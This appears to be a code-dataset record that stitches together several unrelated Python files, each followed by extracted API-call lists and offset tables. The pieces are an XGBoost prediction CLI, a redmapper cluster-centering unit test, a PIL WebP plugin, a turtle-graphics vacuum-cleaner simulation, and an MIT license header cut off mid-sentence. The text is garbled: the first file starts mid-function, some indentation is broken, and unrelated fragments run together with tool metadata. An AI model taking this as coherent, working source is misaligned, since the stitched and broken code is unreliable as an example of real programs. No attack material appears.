    Persist the predictions as a comma-delimited text file, one value per row.

    :param predictions: Predictions as a numpy array
    :param path_to_write_to: Destination file path for the predictions
    """
    np.savetxt(path_to_write_to, predictions, delimiter=',')
def get_xgboost_model(path_to_xgboost_model: str):
    """
    Load a serialized XGBoost booster from disk.

    :param path_to_xgboost_model: Path to the saved xgboost model file
    """
    booster = xgb.Booster()
    booster.load_model(os.path.abspath(path_to_xgboost_model))
    return booster
if __name__ == "__main__":
traceback.install()
sys.exit(main()) # pragma: no cover
| [
"rich.traceback.install",
"click.option",
"os.path.dirname",
"rich.print",
"numpy.array",
"xgboost.Booster",
"numpy.savetxt",
"os.path.abspath",
"xgboost.DMatrix",
"click.command"
] | [((150, 175), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (165, 175), False, 'import os\n'), ((179, 194), 'click.command', 'click.command', ([], {}), '()\n', (192, 194), False, 'import click\n'), ((196, 293), 'click.option', 'click.option', (['"""-i"""', '"""--input"""'], {'required': '(True)', 'type': 'str', 'help': '"""Path to data file to predict."""'}), "('-i', '--input', required=True, type=str, help=\n 'Path to data file to predict.')\n", (208, 293), False, 'import click\n'), ((290, 435), 'click.option', 'click.option', (['"""-m"""', '"""--model"""'], {'type': 'str', 'help': '"""Path to an already trained XGBoost model. If not passed a default model will be loaded."""'}), "('-m', '--model', type=str, help=\n 'Path to an already trained XGBoost model. If not passed a default model will be loaded.'\n )\n", (302, 435), False, 'import click\n'), ((427, 538), 'click.option', 'click.option', (['"""-c/-nc"""', '"""--cuda/--no-cuda"""'], {'type': 'bool', 'default': '(False)', 'help': '"""Whether to enable cuda or not"""'}), "('-c/-nc', '--cuda/--no-cuda', type=bool, default=False, help=\n 'Whether to enable cuda or not')\n", (439, 538), False, 'import click\n'), ((535, 611), 'click.option', 'click.option', (['"""-o"""', '"""--output"""'], {'type': 'str', 'help': '"""Path to write the output to"""'}), "('-o', '--output', type=str, help='Path to write the output to')\n", (547, 611), False, 'import click\n'), ((745, 818), 'rich.print', 'print', (['"""[bold blue]\n {{ cookiecutter.project_name }}\n """'], {}), '("""[bold blue]\n {{ cookiecutter.project_name }}\n """)\n', (750, 818), False, 'from rich import print, traceback\n'), ((825, 947), 'rich.print', 'print', (['"""[bold blue]Run [green]{{ cookiecutter.project_name }} --help [blue]for an overview of all commands\n"""'], {}), '(\n """[bold blue]Run [green]{{ cookiecutter.project_name }} --help [blue]for an overview of all commands\n"""\n )\n', (830, 947), False, 'from rich import 
print, traceback\n'), ((1150, 1183), 'rich.print', 'print', (['"""[bold blue] Parsing data"""'], {}), "('[bold blue] Parsing data')\n", (1155, 1183), False, 'from rich import print, traceback\n'), ((1239, 1282), 'rich.print', 'print', (['"""[bold blue] Performing predictions"""'], {}), "('[bold blue] Performing predictions')\n", (1244, 1282), False, 'from rich import print, traceback\n'), ((1349, 1367), 'rich.print', 'print', (['predictions'], {}), '(predictions)\n', (1354, 1367), False, 'from rich import print, traceback\n'), ((2444, 2455), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (2452, 2455), True, 'import numpy as np\n'), ((2465, 2491), 'xgboost.DMatrix', 'xgb.DMatrix', (['X_np'], {'label': 'y'}), '(X_np, label=y)\n', (2476, 2491), True, 'import xgboost as xgb\n'), ((2813, 2869), 'numpy.savetxt', 'np.savetxt', (['path_to_write_to', 'predictions'], {'delimiter': '""","""'}), "(path_to_write_to, predictions, delimiter=',')\n", (2823, 2869), True, 'import numpy as np\n'), ((3075, 3088), 'xgboost.Booster', 'xgb.Booster', ([], {}), '()\n', (3086, 3088), True, 'import xgboost as xgb\n'), ((3201, 3220), 'rich.traceback.install', 'traceback.install', ([], {}), '()\n', (3218, 3220), False, 'from rich import print, traceback\n'), ((1391, 1443), 'rich.print', 'print', (['f"""[bold blue]Writing predictions to {output}"""'], {}), "(f'[bold blue]Writing predictions to {output}')\n", (1396, 1443), False, 'from rich import print, traceback\n'), ((3110, 3148), 'os.path.abspath', 'os.path.abspath', (['path_to_xgboost_model'], {}), '(path_to_xgboost_model)\n', (3125, 3148), False, 'import os\n')] |
from __future__ import division, absolute_import, print_function
from past.builtins import xrange
import unittest
import numpy.testing as testing
import numpy as np
import fitsio
import os
from numpy import random
from redmapper import Cluster
from redmapper import Configuration
from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite
from redmapper import GalaxyCatalog
from redmapper import RedSequenceColorPar
from redmapper import Background
from redmapper import ZredBackground
from redmapper import ZlambdaCorrectionPar
class CenteringTestCase(unittest.TestCase):
    """
    Test application of the centering models (CenteringWcenZred, CenteringBCG,
    CenteringRandom, CenteringRandomSatelliate).
    """
    def test_wcenzred(self):
        """
        Test running of CenteringWcenZred.
        """
        file_path = 'data_for_tests'
        cluster = self._setup_cluster()
        tempcat = fitsio.read(os.path.join(file_path, 'test_wcen_zred_data.fit'))
        corr_filename = 'test_dr8_zlambdacorr.fit'
        # NOTE(review): this first assignment is immediately overwritten by the
        # equivalent one on the next line.
        zlambda_corr = ZlambdaCorrectionPar(os.path.join(file_path, 'test_dr8_zlambdacorr.fit'), zlambda_pivot=30.0)
        zlambda_corr = ZlambdaCorrectionPar(file_path + '/' + corr_filename, zlambda_pivot=30.0)
        # And the meat of it...
        cent = CenteringWcenZred(cluster, zlambda_corr=zlambda_corr)
        cent.find_center()
        # Compare against the reference values stored in the test catalog.
        testing.assert_almost_equal(cent.p_cen, tempcat[0]['PCEN'][tempcat[0]['GOOD']], 5)
        testing.assert_almost_equal(cent.q_cen, tempcat[0]['QCEN'][tempcat[0]['GOOD']], 4)
        testing.assert_almost_equal(cent.p_sat, tempcat[0]['PSAT'], 4)
        testing.assert_almost_equal(cent.p_fg, tempcat[0]['PFG'], 4)
        testing.assert_array_equal(cent.index, tempcat[0]['USE'][tempcat[0]['GOOD']])
    def test_bcg(self):
        """
        Test running of CenteringBcg.
        """
        cluster = self._setup_cluster()
        cent = CenteringBCG(cluster)
        cent.find_center()
        self.assertEqual(cent.maxind, 72)
        self.assertEqual(cent.ngood, 1)
        testing.assert_almost_equal(cent.ra, 150.55890608)
        testing.assert_almost_equal(cent.dec, 20.53794937)
        testing.assert_almost_equal(cent.p_cen[0], 1.0)
        testing.assert_almost_equal(cent.q_cen[0], 1.0)
        testing.assert_almost_equal(cent.p_sat[0], 0.0)
    def test_random(self):
        """
        Test running of CenteringRandom.
        """
        # Fixed seed keeps the randomly chosen center reproducible.
        random.seed(seed=12345)
        cluster = self._setup_cluster()
        cent = CenteringRandom(cluster)
        cent.find_center()
        self.assertEqual(cent.maxind, -1)
        self.assertEqual(cent.ngood, 1)
        testing.assert_almost_equal(cent.ra[0], 150.57049502423266)
        testing.assert_almost_equal(cent.dec[0], 20.604521924053167)
        testing.assert_almost_equal(cent.p_cen[0], 1.0)
        testing.assert_almost_equal(cent.q_cen[0], 1.0)
        testing.assert_almost_equal(cent.p_sat[0], 0.0)
    def test_randsat(self):
        """
        Test running of CenteringRandomSatellite.
        """
        # Fixed seed keeps the randomly chosen satellite reproducible.
        random.seed(seed=12345)
        cluster = self._setup_cluster()
        cent = CenteringRandomSatellite(cluster)
        cent.find_center()
        # Confirmed that the distribution is correct, this just checks for regression
        self.assertEqual(cent.maxind, 721)
        self.assertEqual(cent.ngood, 1)
        testing.assert_almost_equal(cent.ra[0], 150.67510227)
        testing.assert_almost_equal(cent.dec[0], 20.48011092)
        testing.assert_almost_equal(cent.p_cen[0], 1.0)
        testing.assert_almost_equal(cent.q_cen[0], 1.0)
        testing.assert_almost_equal(cent.p_sat[0], 0.0)
    def _setup_cluster(self):
        """
        Set up the cluster to run through the centering code.
        """
        file_path = 'data_for_tests'
        cluster = Cluster()
        cluster.config = Configuration(os.path.join(file_path, 'testconfig.yaml'))
        tempcat = fitsio.read(os.path.join(file_path, 'test_wcen_zred_data.fit'))
        # Build a neighbor catalog from the reference arrays in the test file.
        temp_neighbors = np.zeros(tempcat[0]['RAS'].size,
                                 dtype = [('RA', 'f8'),
                                         ('DEC', 'f8'),
                                         ('DIST', 'f4'),
                                         ('R', 'f4'),
                                         ('P', 'f4'),
                                         ('PFREE', 'f4'),
                                         ('PMEM', 'f4'),
                                         ('MAG', 'f4', 5),
                                         ('MAG_ERR', 'f4', 5),
                                         ('REFMAG', 'f4'),
                                         ('REFMAG_ERR', 'f4'),
                                         ('CHISQ', 'f4'),
                                         ('ZRED', 'f4'),
                                         ('ZRED_E', 'f4'),
                                         ('ZRED_CHISQ', 'f4')])
        temp_neighbors['RA'] = tempcat[0]['RAS']
        temp_neighbors['DEC'] = tempcat[0]['DECS']
        temp_neighbors['R'] = tempcat[0]['R']
        temp_neighbors['P'] = tempcat[0]['PVALS']
        temp_neighbors['PFREE'] = tempcat[0]['WVALS']
        temp_neighbors['PMEM'] = tempcat[0]['WTVALS']
        temp_neighbors['REFMAG'] = tempcat[0]['REFMAG_TOTAL']
        temp_neighbors['ZRED'] = tempcat[0]['GZREDS']
        temp_neighbors['ZRED_E'] = tempcat[0]['GZREDE']
        temp_neighbors['ZRED_CHISQ'] = tempcat[0]['GCHISQ']
        # Convert physical radius to angular distance at the cluster redshift.
        temp_neighbors['DIST'] = tempcat[0]['R'] / (np.radians(1.) * cluster.config.cosmo.Da(0, tempcat[0]['ZCLUSTER']))
        neighbors = GalaxyCatalog(temp_neighbors)
        cluster.set_neighbors(neighbors)
        # NOTE(review): zred_filename is assigned but never used; the path is
        # hard-coded again on the next line.
        zred_filename = 'test_dr8_pars.fit'
        cluster.zredstr = RedSequenceColorPar(os.path.join(file_path, 'test_dr8_pars.fit'), fine=True, zrange=[0.25, 0.35])
        cluster.bkg = Background(os.path.join(file_path, 'test_bkg.fit'))
        cluster.zredbkg = ZredBackground(os.path.join(file_path, 'test_bkg.fit'))
        cluster.redshift = tempcat[0]['ZCLUSTER']
        cluster.ra = tempcat[0]['RAC']
        cluster.dec = tempcat[0]['DECC']
        cluster.r_lambda = 1.0 * (tempcat[0]['LAMBDA'] / 100.0)**0.2
        cluster.Lambda = tempcat[0]['LAMBDA']
        cluster.scaleval = tempcat[0]['SCALEVAL']
        return cluster
if __name__=='__main__':
    # Allow running this test module directly.
    unittest.main()
| [
"numpy.radians",
"redmapper.Cluster",
"redmapper.CenteringWcenZred",
"os.path.join",
"numpy.testing.assert_almost_equal",
"numpy.zeros",
"redmapper.ZlambdaCorrectionPar",
"redmapper.CenteringRandom",
"redmapper.CenteringBCG",
"numpy.random.seed",
"unittest.main",
"redmapper.GalaxyCatalog",
"... | [((6462, 6477), 'unittest.main', 'unittest.main', ([], {}), '()\n', (6475, 6477), False, 'import unittest\n'), ((1209, 1282), 'redmapper.ZlambdaCorrectionPar', 'ZlambdaCorrectionPar', (["(file_path + '/' + corr_filename)"], {'zlambda_pivot': '(30.0)'}), "(file_path + '/' + corr_filename, zlambda_pivot=30.0)\n", (1229, 1282), False, 'from redmapper import ZlambdaCorrectionPar\n'), ((1332, 1385), 'redmapper.CenteringWcenZred', 'CenteringWcenZred', (['cluster'], {'zlambda_corr': 'zlambda_corr'}), '(cluster, zlambda_corr=zlambda_corr)\n', (1349, 1385), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((1422, 1509), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen', "tempcat[0]['PCEN'][tempcat[0]['GOOD']]", '(5)'], {}), "(cent.p_cen, tempcat[0]['PCEN'][tempcat[0][\n 'GOOD']], 5)\n", (1449, 1509), True, 'import numpy.testing as testing\n'), ((1513, 1600), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen', "tempcat[0]['QCEN'][tempcat[0]['GOOD']]", '(4)'], {}), "(cent.q_cen, tempcat[0]['QCEN'][tempcat[0][\n 'GOOD']], 4)\n", (1540, 1600), True, 'import numpy.testing as testing\n'), ((1604, 1666), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat', "tempcat[0]['PSAT']", '(4)'], {}), "(cent.p_sat, tempcat[0]['PSAT'], 4)\n", (1631, 1666), True, 'import numpy.testing as testing\n'), ((1675, 1735), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_fg', "tempcat[0]['PFG']", '(4)'], {}), "(cent.p_fg, tempcat[0]['PFG'], 4)\n", (1702, 1735), True, 'import numpy.testing as testing\n'), ((1744, 1821), 'numpy.testing.assert_array_equal', 'testing.assert_array_equal', (['cent.index', "tempcat[0]['USE'][tempcat[0]['GOOD']]"], {}), "(cent.index, tempcat[0]['USE'][tempcat[0]['GOOD']])\n", (1770, 1821), True, 'import numpy.testing as testing\n'), ((1965, 1986), 'redmapper.CenteringBCG', 
'CenteringBCG', (['cluster'], {}), '(cluster)\n', (1977, 1986), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((2105, 2155), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.ra', '(150.55890608)'], {}), '(cent.ra, 150.55890608)\n', (2132, 2155), True, 'import numpy.testing as testing\n'), ((2164, 2214), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.dec', '(20.53794937)'], {}), '(cent.dec, 20.53794937)\n', (2191, 2214), True, 'import numpy.testing as testing\n'), ((2223, 2270), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen[0]', '(1.0)'], {}), '(cent.p_cen[0], 1.0)\n', (2250, 2270), True, 'import numpy.testing as testing\n'), ((2279, 2326), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen[0]', '(1.0)'], {}), '(cent.q_cen[0], 1.0)\n', (2306, 2326), True, 'import numpy.testing as testing\n'), ((2335, 2382), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat[0]', '(0.0)'], {}), '(cent.p_sat[0], 0.0)\n', (2362, 2382), True, 'import numpy.testing as testing\n'), ((2485, 2508), 'numpy.random.seed', 'random.seed', ([], {'seed': '(12345)'}), '(seed=12345)\n', (2496, 2508), False, 'from numpy import random\n'), ((2566, 2590), 'redmapper.CenteringRandom', 'CenteringRandom', (['cluster'], {}), '(cluster)\n', (2581, 2590), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((2709, 2768), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.ra[0]', '(150.57049502423266)'], {}), '(cent.ra[0], 150.57049502423266)\n', (2736, 2768), True, 'import numpy.testing as testing\n'), ((2777, 2837), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.dec[0]', '(20.604521924053167)'], {}), '(cent.dec[0], 20.604521924053167)\n', (2804, 2837), True, 'import numpy.testing as 
testing\n'), ((2846, 2893), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen[0]', '(1.0)'], {}), '(cent.p_cen[0], 1.0)\n', (2873, 2893), True, 'import numpy.testing as testing\n'), ((2902, 2949), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen[0]', '(1.0)'], {}), '(cent.q_cen[0], 1.0)\n', (2929, 2949), True, 'import numpy.testing as testing\n'), ((2958, 3005), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat[0]', '(0.0)'], {}), '(cent.p_sat[0], 0.0)\n', (2985, 3005), True, 'import numpy.testing as testing\n'), ((3118, 3141), 'numpy.random.seed', 'random.seed', ([], {'seed': '(12345)'}), '(seed=12345)\n', (3129, 3141), False, 'from numpy import random\n'), ((3199, 3232), 'redmapper.CenteringRandomSatellite', 'CenteringRandomSatellite', (['cluster'], {}), '(cluster)\n', (3223, 3232), False, 'from redmapper import CenteringWcenZred, CenteringBCG, CenteringRandom, CenteringRandomSatellite\n'), ((3439, 3492), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.ra[0]', '(150.67510227)'], {}), '(cent.ra[0], 150.67510227)\n', (3466, 3492), True, 'import numpy.testing as testing\n'), ((3501, 3554), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.dec[0]', '(20.48011092)'], {}), '(cent.dec[0], 20.48011092)\n', (3528, 3554), True, 'import numpy.testing as testing\n'), ((3563, 3610), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_cen[0]', '(1.0)'], {}), '(cent.p_cen[0], 1.0)\n', (3590, 3610), True, 'import numpy.testing as testing\n'), ((3619, 3666), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.q_cen[0]', '(1.0)'], {}), '(cent.q_cen[0], 1.0)\n', (3646, 3666), True, 'import numpy.testing as testing\n'), ((3675, 3722), 'numpy.testing.assert_almost_equal', 'testing.assert_almost_equal', (['cent.p_sat[0]', '(0.0)'], {}), '(cent.p_sat[0], 0.0)\n', (3702, 3722), True, 
'import numpy.testing as testing\n'), ((3896, 3905), 'redmapper.Cluster', 'Cluster', ([], {}), '()\n', (3903, 3905), False, 'from redmapper import Cluster\n'), ((4099, 4415), 'numpy.zeros', 'np.zeros', (["tempcat[0]['RAS'].size"], {'dtype': "[('RA', 'f8'), ('DEC', 'f8'), ('DIST', 'f4'), ('R', 'f4'), ('P', 'f4'), (\n 'PFREE', 'f4'), ('PMEM', 'f4'), ('MAG', 'f4', 5), ('MAG_ERR', 'f4', 5),\n ('REFMAG', 'f4'), ('REFMAG_ERR', 'f4'), ('CHISQ', 'f4'), ('ZRED', 'f4'),\n ('ZRED_E', 'f4'), ('ZRED_CHISQ', 'f4')]"}), "(tempcat[0]['RAS'].size, dtype=[('RA', 'f8'), ('DEC', 'f8'), (\n 'DIST', 'f4'), ('R', 'f4'), ('P', 'f4'), ('PFREE', 'f4'), ('PMEM', 'f4'\n ), ('MAG', 'f4', 5), ('MAG_ERR', 'f4', 5), ('REFMAG', 'f4'), (\n 'REFMAG_ERR', 'f4'), ('CHISQ', 'f4'), ('ZRED', 'f4'), ('ZRED_E', 'f4'),\n ('ZRED_CHISQ', 'f4')])\n", (4107, 4415), True, 'import numpy as np\n'), ((5714, 5743), 'redmapper.GalaxyCatalog', 'GalaxyCatalog', (['temp_neighbors'], {}), '(temp_neighbors)\n', (5727, 5743), False, 'from redmapper import GalaxyCatalog\n'), ((965, 1015), 'os.path.join', 'os.path.join', (['file_path', '"""test_wcen_zred_data.fit"""'], {}), "(file_path, 'test_wcen_zred_data.fit')\n", (977, 1015), False, 'import os\n'), ((1113, 1164), 'os.path.join', 'os.path.join', (['file_path', '"""test_dr8_zlambdacorr.fit"""'], {}), "(file_path, 'test_dr8_zlambdacorr.fit')\n", (1125, 1164), False, 'import os\n'), ((3946, 3988), 'os.path.join', 'os.path.join', (['file_path', '"""testconfig.yaml"""'], {}), "(file_path, 'testconfig.yaml')\n", (3958, 3988), False, 'import os\n'), ((4021, 4071), 'os.path.join', 'os.path.join', (['file_path', '"""test_wcen_zred_data.fit"""'], {}), "(file_path, 'test_wcen_zred_data.fit')\n", (4033, 4071), False, 'import os\n'), ((5876, 5920), 'os.path.join', 'os.path.join', (['file_path', '"""test_dr8_pars.fit"""'], {}), "(file_path, 'test_dr8_pars.fit')\n", (5888, 5920), False, 'import os\n'), ((5988, 6027), 'os.path.join', 'os.path.join', (['file_path', '"""test_bkg.fit"""'], 
{}), "(file_path, 'test_bkg.fit')\n", (6000, 6027), False, 'import os\n'), ((6070, 6109), 'os.path.join', 'os.path.join', (['file_path', '"""test_bkg.fit"""'], {}), "(file_path, 'test_bkg.fit')\n", (6082, 6109), False, 'import os\n'), ((5624, 5639), 'numpy.radians', 'np.radians', (['(1.0)'], {}), '(1.0)\n', (5634, 5639), True, 'import numpy as np\n')] |
from PIL import Image
from PIL import ImageFile
from io import BytesIO
import _webp
def _accept(prefix):
return prefix[:4] == b"RIFF" and prefix[8:16] == b"WEBPVP8 "
class WebPImageFile(ImageFile.ImageFile):
    """PIL image plugin for the WebP format (RGB only, decoded eagerly)."""

    format = "WEBP"
    format_description = "WebP image"

    def _open(self):
        # Decode the whole stream up front via the native helper, then
        # present the raw RGB bytes to PIL through an in-memory file.
        rgb_data, w, h = _webp.WebPDecodeRGB(self.fp.read())
        self.mode = "RGB"
        self.size = (w, h)
        self.fp = BytesIO(rgb_data)
        self.tile = [("raw", (0, 0) + self.size, 0, "RGB")]
def _save(im, fp, filename):
    """Encode *im* as WebP and write the result to the file object *fp*."""
    # The bundled encoder only understands packed RGB data.
    if im.mode != "RGB":
        raise IOError("cannot write mode %s as WEBP" % im.mode)
    quality = float(im.encoderinfo.get("quality", 80))
    width, height = im.size
    encoded = _webp.WebPEncodeRGB(im.tostring(), width, height, width * 3, quality)
    fp.write(encoded)
# Register the WebP codec with PIL: Image.open() dispatches to
# WebPImageFile via the _accept signature check, and Image.save()
# routes ".webp" / "image/webp" output through _save.
Image.register_open("WEBP", WebPImageFile, _accept)
Image.register_save("WEBP", _save)
Image.register_extension("WEBP", ".webp")
Image.register_mime("WEBP", "image/webp")
| [
"PIL.Image.register_save",
"io.BytesIO",
"PIL.Image.register_extension",
"PIL.Image.register_mime",
"PIL.Image.register_open"
] | [((807, 858), 'PIL.Image.register_open', 'Image.register_open', (['"""WEBP"""', 'WebPImageFile', '_accept'], {}), "('WEBP', WebPImageFile, _accept)\n", (826, 858), False, 'from PIL import Image\n'), ((859, 893), 'PIL.Image.register_save', 'Image.register_save', (['"""WEBP"""', '_save'], {}), "('WEBP', _save)\n", (878, 893), False, 'from PIL import Image\n'), ((895, 936), 'PIL.Image.register_extension', 'Image.register_extension', (['"""WEBP"""', '""".webp"""'], {}), "('WEBP', '.webp')\n", (919, 936), False, 'from PIL import Image\n'), ((937, 978), 'PIL.Image.register_mime', 'Image.register_mime', (['"""WEBP"""', '"""image/webp"""'], {}), "('WEBP', 'image/webp')\n", (956, 978), False, 'from PIL import Image\n'), ((439, 452), 'io.BytesIO', 'BytesIO', (['data'], {}), '(data)\n', (446, 452), False, 'from io import BytesIO\n')] |
from turtle import Turtle, Screen
from random import choice
from time import sleep
from queue import SimpleQueue
# Window dimensions (width x height) of the two-room world.
w: int
w, h = (853, 480)
wn = Screen()
wn.screensize(w, h)
wn.bgcolor("#d3d3d3")
# Fill colour used to visualise each room's state.
Room_state = {"Clean": "#FFFFFF",
              "Dirty": "#b5651d"}
# Running total of cleanings performed by the vacuum (updated in filler()).
cleaned = 0
def filler(t, color, delay=0, vacclean = False):
    """Fill the 130-radius room circle drawn by turtle ``t`` with ``color``.

    When painting a room clean, waits ``delay`` seconds first and, if
    ``vacclean`` is True, counts the fill as a cleaning performed by the
    vacuum (increments the global ``cleaned`` counter).
    """
    global cleaned
    t.fillcolor(color)
    t.penup()
    if color == Room_state['Clean']:
        sleep(delay)  # pause so the cleaning is not instantaneous on screen
        if vacclean:
            cleaned += 1
    t.begin_fill()
    t.circle(130)
    t.end_fill()
def setup():
    """Draw both rooms, their captions and the outer boundary.

    Returns the four turtles: circle painters for rooms A and B, and the
    text writers X and Y positioned below each room.
    """
    A, B, X, Y = Turtle(), Turtle(), Turtle(), Turtle()
    placements = ((A, -w / 4, -120), (B, w / 4, -120),
                  (X, -w / 4, -200), (Y, w / 4, -200))
    for t, x, y in placements:
        t.ht()
        t.speed(100)
        t.penup()
        t.setpos(x, y)
    # Both rooms start out clean.
    for room in (A, B):
        room.pendown()
        filler(room, Room_state['Clean'], False)
    # Draw the outer rectangle and the dividing wall.
    border = Turtle()
    border.ht()
    border.speed(20)
    border.penup()
    border.setposition(w / 2, h / 2)
    border.pendown()
    border.pensize(10)
    for side in (h, w, h, w):
        border.right(90)
        border.forward(side)
    border.backward(w / 2)
    border.right(90)
    border.pensize(5)
    border.forward(h - 90)
    border.penup()
    # Label each room at the top of its half.
    for x, label in ((-w / 4, "Room A"), (w / 4, "Room B")):
        border.setpos(x, h / 2 - 70)
        border.write(label, align="center", font=("Arial", 20, "normal"))
    return A, B, X, Y
A, B, X, Y = setup()
# Vacuum cleaner turtle: starts on top of room A's circle.
C = Turtle()
C.speed(8)
C.penup()
C.shape("circle")
C.setpos(A.xcor(), A.ycor() + 130)
count = 1  # iteration counter shown on screen
# NOTE(review): 'iter' shadows the builtin of the same name; renaming it
# would also require changing the main loop below.
iter = Turtle()         # writes the iteration counter
cleanwriter = Turtle()  # writes the cleaning counter
iter.ht()
cleanwriter.ht()
iter.penup()
cleanwriter.penup()
iter.setpos(0, -h / 2 + 50)
cleanwriter.setpos(0, -h / 2 + 20)
room_state = list(Room_state.keys())  # ["Clean", "Dirty"]
state = SimpleQueue()
# Seed the queue with a random initial (room A, room B) state pair.
state.put_nowait(((choice(room_state)), choice(room_state)))
# Main simulation loop: each iteration consumes the queued (A, B) states,
# pre-draws next iteration's states, and moves the vacuum to clean dirty
# rooms (both rooms in one pass when both are dirty).
while True:
    # Refresh the on-screen counters.
    iter.clear()
    cleanwriter.clear()
    iter.write("Iteration : " + str(count), align="center", font=("Arial", 16, "normal"))
    cleanwriter.write("Times Cleaned : " + str(cleaned), align="center", font=("Arial", 16, "normal"))
    # States for this iteration were queued on the previous one.
    condition = state.get_nowait()
    stateA = condition[0]
    stateB = condition[1]
    X.clear()
    Y.clear()
    # Draw the rooms' current states and announce next iteration's states.
    nextA = choice(room_state)
    nextB = choice(room_state)
    state.put_nowait((nextA, nextB))
    filler(A, Room_state[stateA])
    filler(B, Room_state[stateB])
    X.write("Now : " + stateA + "\nNext : " + nextA, align="center", font=("Arial", 16, "normal"))
    Y.write("Now : " + stateB + "\nNext : " + nextB, align="center", font=("Arial", 16, "normal"))
    print("\nA : " + stateA, "\tB : " + stateB)
    # Both rooms dirty: clean the vacuum's current room first, then travel
    # to the other room and clean it too.
    if stateA == 'Dirty' and stateB == 'Dirty':
        if C.xcor() < 0:
            print("Both Dirty, Cleaned A going to B")
            # noinspection PyTypeChecker
            filler(A, Room_state['Clean'], 0.5, True)
            stateA = 'Clean'
            C.setpos(B.xcor(), B.ycor() + 130)
            # noinspection PyTypeChecker
            filler(B, Room_state['Clean'], 0.5, True)
            stateB = 'Clean'
        elif C.xcor() > 0:
            print("Both Dirty, Cleaned B going to A")
            # noinspection PyTypeChecker
            filler(B, Room_state['Clean'], 0.5, True)
            stateB = 'Clean'
            C.setpos(A.xcor(), A.ycor() + 130)
            # noinspection PyTypeChecker
            filler(A, Room_state['Clean'], 0.5, True)
            stateA = 'Clean'
    # Exactly one room dirty: travel there and clean it.
    if stateA == 'Dirty':
        print("Cleaned A")
        C.goto(A.xcor(), A.ycor() + 130)
        # noinspection PyTypeChecker
        filler(A, Room_state['Clean'], 0.3, True)
    elif stateB == 'Dirty':
        print("Cleaned B")
        C.goto(B.xcor(), B.ycor() + 130)
        # noinspection PyTypeChecker
        filler(B, Room_state['Clean'], 0.3, True)
    count += 1
sleep(0.5) | [
"random.choice",
"time.sleep",
"turtle.Screen",
"queue.SimpleQueue",
"turtle.Turtle"
] | [((145, 153), 'turtle.Screen', 'Screen', ([], {}), '()\n', (151, 153), False, 'from turtle import Turtle, Screen\n'), ((1792, 1800), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1798, 1800), False, 'from turtle import Turtle, Screen\n'), ((1893, 1901), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1899, 1901), False, 'from turtle import Turtle, Screen\n'), ((1916, 1924), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1922, 1924), False, 'from turtle import Turtle, Screen\n'), ((2095, 2108), 'queue.SimpleQueue', 'SimpleQueue', ([], {}), '()\n', (2106, 2108), False, 'from queue import SimpleQueue\n'), ((592, 600), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (598, 600), False, 'from turtle import Turtle, Screen\n'), ((629, 637), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (635, 637), False, 'from turtle import Turtle, Screen\n'), ((666, 674), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (672, 674), False, 'from turtle import Turtle, Screen\n'), ((698, 706), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (704, 706), False, 'from turtle import Turtle, Screen\n'), ((1161, 1169), 'turtle.Turtle', 'Turtle', ([], {}), '()\n', (1167, 1169), False, 'from turtle import Turtle, Screen\n'), ((2548, 2566), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2554, 2566), False, 'from random import choice\n'), ((2579, 2597), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2585, 2597), False, 'from random import choice\n'), ((4139, 4149), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (4144, 4149), False, 'from time import sleep\n'), ((429, 441), 'time.sleep', 'sleep', (['delay'], {}), '(delay)\n', (434, 441), False, 'from time import sleep\n'), ((2128, 2146), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2134, 2146), False, 'from random import choice\n'), ((2149, 2167), 'random.choice', 'choice', (['room_state'], {}), '(room_state)\n', (2155, 2167), False, 'from random import choice\n')] |
"""
Copyright (c) 2017 Cyberhaven
Copyright (c) 2017 Dependable Systems Laboratory, EPFL
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
